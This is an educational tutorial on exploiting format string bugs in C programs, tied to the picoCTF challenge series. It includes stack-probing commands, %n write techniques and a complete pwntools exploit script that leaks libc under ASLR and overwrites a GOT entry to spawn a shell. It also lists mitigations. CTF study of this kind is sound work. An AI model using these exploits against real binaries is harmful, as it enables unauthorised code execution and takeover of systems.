Format String Vulnerabilities for CTF Binary Exploitation

Introduction

A format string vulnerability occurs when a C program passes user-controlled input directly as the first argument to printf or a related function. Instead of treating the input as data to print, printf interprets it as a format string and acts on any % specifiers it contains. An attacker can use this to read arbitrary memory and, in some cases, write to any address in the process.

This vulnerability class is at the heart of the picoCTF format string series: format string 0, format string 1, format string 2, and format string 3. Each challenge adds one more concept. Work through them in order.

How printf works

The printf family of functions reads a format string and consumes additional arguments from the call stack to fill in each format specifier. When called correctly it looks like this:

printf("%s scored %d points", username, score);
// The format string is a string literal, not user input.

The vulnerable version passes user input as the format string:

char buf[256];
fgets(buf, sizeof(buf), stdin);
printf(buf);   // BUG: buf is user-controlled

When printf encounters %s in the format string it looks on the stack for the next argument (a pointer to a string) and dereferences it. If the caller never provided that argument, printf reads whatever happens to be on the stack at that position, which is attacker-readable process memory.

Note: The vulnerability requires that the attacker controls the format string. If printf("%s", buf) is used instead, the input is always treated as a plain string and no specifiers are interpreted.

Reading memory with %x and %s

Send %x specifiers to dump stack values as hex integers. Each %x consumes one word from the stack:

$ echo '%x %x %x %x %x %x %x %x' | ./vulnerable
f7f9e580 0 0 0 f7f5a700 61616161 25207825 78252078

Use %p instead of %x to get pointer-width output with a 0x prefix, which is cleaner on 64-bit systems:

$ echo '%p %p %p %p %p %p' | ./vulnerable

If you want to read from a specific stack offset without cycling through all the preceding ones, use the positional argument syntax %N$x where N is the index:

$ echo '%6$x' | ./vulnerable   # read the 6th stack word
$ echo '%6$p' | ./vulnerable   # same, as a pointer

To dereference a pointer on the stack and read the string it points to, use %s:

$ echo '%6$s' | ./vulnerable   # dereference the 6th stack word as a string

Warning: %s will crash the program if the value at the target position is not a valid readable pointer. Use %x or %p first to identify which positions hold addresses, then dereference specific ones.

Finding the format string offset

The key skill in format string exploitation is finding the offset at which your own input appears on the stack. Once you know it, you can place an address in the input and use %N$s to dereference it, or %N$n to write to it.

The technique is to start the input with a recognizable marker like AAAA (hex value 0x41414141) and then scan the stack output for that value:

$ echo 'AAAA %x %x %x %x %x %x %x %x %x %x' | ./vulnerable
AAAA f7f9e580 0 0 0 f7f5a700 41414141 25207825 ...
#                                  ^^^^^^^^
#                         This is our AAAA, at position 6

In the example above, our marker appears at the 6th position. We can confirm this with:

$ echo 'AAAA %6$x' | ./vulnerable
AAAA 41414141   # confirmed: offset is 6

On 64-bit systems, use 8-byte markers (e.g. AAAAAAAA, hex 0x4141414141414141) and look for them in the %p output.

Writing with %n

The %n specifier writes the number of bytes printed so far into the pointer argument it consumes. This turns a read vulnerability into an arbitrary write. If you can place a target address at a known stack offset, %N$n will write to it.

The value written equals the number of characters already output by printf. Use width padding to control it. For example, to write the value 100 (0x64):

# Pad to exactly 100 characters before %n
# The target address is at stack offset 6
printf '%100c%6$n'

To write larger values (like a function address), use %hn (write 2 bytes) or split the write into multiple partial writes, one 2-byte chunk at a time. This is the basis of the GOT (Global Offset Table) overwrite technique used in format string 3.

Tip: Use checksec (part of pwntools) to check whether the binary has RELRO. Full RELRO makes the GOT read-only after dynamic linking, preventing GOT overwrites. Partial RELRO (the default) leaves it writable.

GOT and PLT primer

The GOT overwrite technique used in format string 3 requires understanding two tables that exist in every dynamically linked Linux binary.

The PLT (Procedure Linkage Table)

When a binary calls a shared library function like puts, it does not call the real puts directly. Instead it calls a stub in the PLT, which looks up the real address in the GOT and jumps to it. The PLT address for a function is fixed and can be found with:

objdump -d ./binary | grep '<puts@plt>'
# Example: 0000000000401030 <puts@plt>

The GOT (Global Offset Table)

The GOT is a writable table of pointers. When the dynamic linker resolves puts for the first time, it writes the real address of puts into a GOT entry. Every subsequent call goes through the PLT stubs and reads from the GOT. On a binary with Partial RELRO, these GOT entries are writable after startup.

# Find the GOT entry address for a function:
objdump -R ./binary | grep puts
# Example: 0000000000404018 R_X86_64_JUMP_SLOT  puts@GLIBC
#           ^^^^^^^^^^^^^^^^ this is the GOT entry you want to overwrite

Why overwriting the GOT gives code execution

If you overwrite the GOT entry for puts with the address of system, then the next time the binary calls puts(something), it actually calls system(something). If you control what string is passed toputs, you pass "/bin/sh" and get a shell.

# Step 1: find the GOT entry to overwrite
GOT_puts = 0x404018    # from objdump -R
# Step 2: find the address to write (system from libc, or win() from binary)
system_addr = 0xdeadbeef   # see 'Leaking libc with ASLR' section below
# Step 3: build the format string payload
payload = fmtstr_payload(offset, {GOT_puts: system_addr})

Tip: Run checksec ./binary first. Full RELRO makes the GOT read-only, blocking this attack. Partial RELRO (the default in most CTF binaries) leaves it writable. No RELRO means even the .got section is writable.

Leaking a libc address with ASLR

When ASLR is enabled, the address of system changes every run. You cannot hardcode it. The format string read primitive gives you a way to leak a runtime address and compute the correct system address dynamically.

The full workflow for a PIE binary with ASLR and Partial RELRO:

from pwn import *
elf  = ELF('./vulnerable')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p    = process('./vulnerable')
# --- Round 1: leak a libc address ---
# The GOT entry for printf holds the runtime address of printf in libc.
# Use %s at the right offset to dereference and print it.
# First, find offset where your buffer appears on the stack (use AAAA + %p chain).
offset = 6
# Build a leak payload that reads the GOT entry for printf:
GOT_printf = elf.got['printf']
leak_payload = p64(GOT_printf) + b'%' + str(offset).encode() + b'$s'
# Note: on 64-bit, the address goes AT the offset position, so align padding carefully.
# fmtstr_payload cannot do reads; build this manually.
p.sendline(leak_payload)
leak = u64(p.recvuntil(b'\n')[:8].ljust(8, b'\x00'))
# --- Compute libc base from the leak ---
libc.address = leak - libc.symbols['printf']
system_addr  = libc.symbols['system']
bin_sh_addr  = next(libc.search(b'/bin/sh'))
# --- Round 2: GOT overwrite ---
write_payload = fmtstr_payload(offset, {elf.got['puts']: system_addr})
p.sendline(write_payload)
# Next call to puts('/bin/sh') becomes system('/bin/sh')
p.sendline(b'/bin/sh')
p.interactive()

Note: The 64-bit version of this attack is trickier than 32-bit because arguments 1-6 are passed in registers, not on the stack. Your format string buffer is typically at a higher stack offset. Use %p %p %p ... to map the stack and find where the buffer appears, then adjust offset accordingly.

Automating with pwntools

pwntools is a Python library for writing exploit scripts. It handles process I/O, socket connections, and format string payload generation:

pip install pwntools

from pwn import *
# Connect to a local process or remote server
p = process('./vulnerable')
# p = remote('challenge.picoctf.org', 12345)
# Send a format string to leak stack values
p.sendline(b'%p %p %p %p %p %p')
leak = p.recvline()
print(leak)
# Build a format string payload that writes target_value to target_addr
# offset = the stack index where your buffer appears
payload = fmtstr_payload(offset, {target_addr: target_value})
p.sendline(payload)
p.interactive()

The fmtstr_payload function from pwntools builds the entire payload for you, handling the address placement, padding arithmetic, and split writes needed to overwrite arbitrary memory. The only inputs you need are the stack offset and a dictionary of address: value pairs to write.

The picoCTF format string series

format string 0Easy

Introduces the bug conceptually. A buffer overflow of a format string crashes the program in the right way to print the flag. No memory reading required.

format string 1Medium

Read a secret value off the stack using %x specifiers. Practice scanning for a recognizable pattern in the leak output.

format string 2Medium

Overwrite a specific variable in memory using %n. Introduces the concept of writing to a known address by placing it in the input buffer.

format string 3Medium

Full GOT overwrite. Redirect a library function pointer to system so that the next call to the original function instead spawns a shell.

Mitigations

Modern compilers and operating systems include several defenses against format string exploits:

-Wformat-security: GCC warns when printf is called with a non-literal format string. Enabled in most production builds.
Full RELRO: marks the GOT read-only after dynamic linking, preventing GOT overwrites.
ASLR: randomizes where the stack and libraries are loaded, making it harder to hardcode target addresses. Must be combined with an address leak step.
Stack canaries: detect adjacent buffer overflows but do not directly mitigate format string writes.

Tip: Run checksec ./binary (pwntools) to see which mitigations are active on a CTF binary. Partial RELRO with no PIE is the classic easy-mode setup; Full RELRO with PIE and ASLR requires leaking an address before writing.

Quick reference

Specifier	Effect
%x	Print the next stack word as hex
%p	Print the next stack word as a pointer (0x...)
%s	Dereference the next stack word as a string pointer
%n	Write the bytes-printed count to the next stack pointer
%hn	Write 2 bytes (short) instead of 4
%hhn	Write 1 byte
%N$x	Print the Nth stack word (1-indexed) as hex
%Nc	Print N space characters (controls write value for %n)
fmtstr_payload(off, {addr: val})	pwntools: build a complete write payload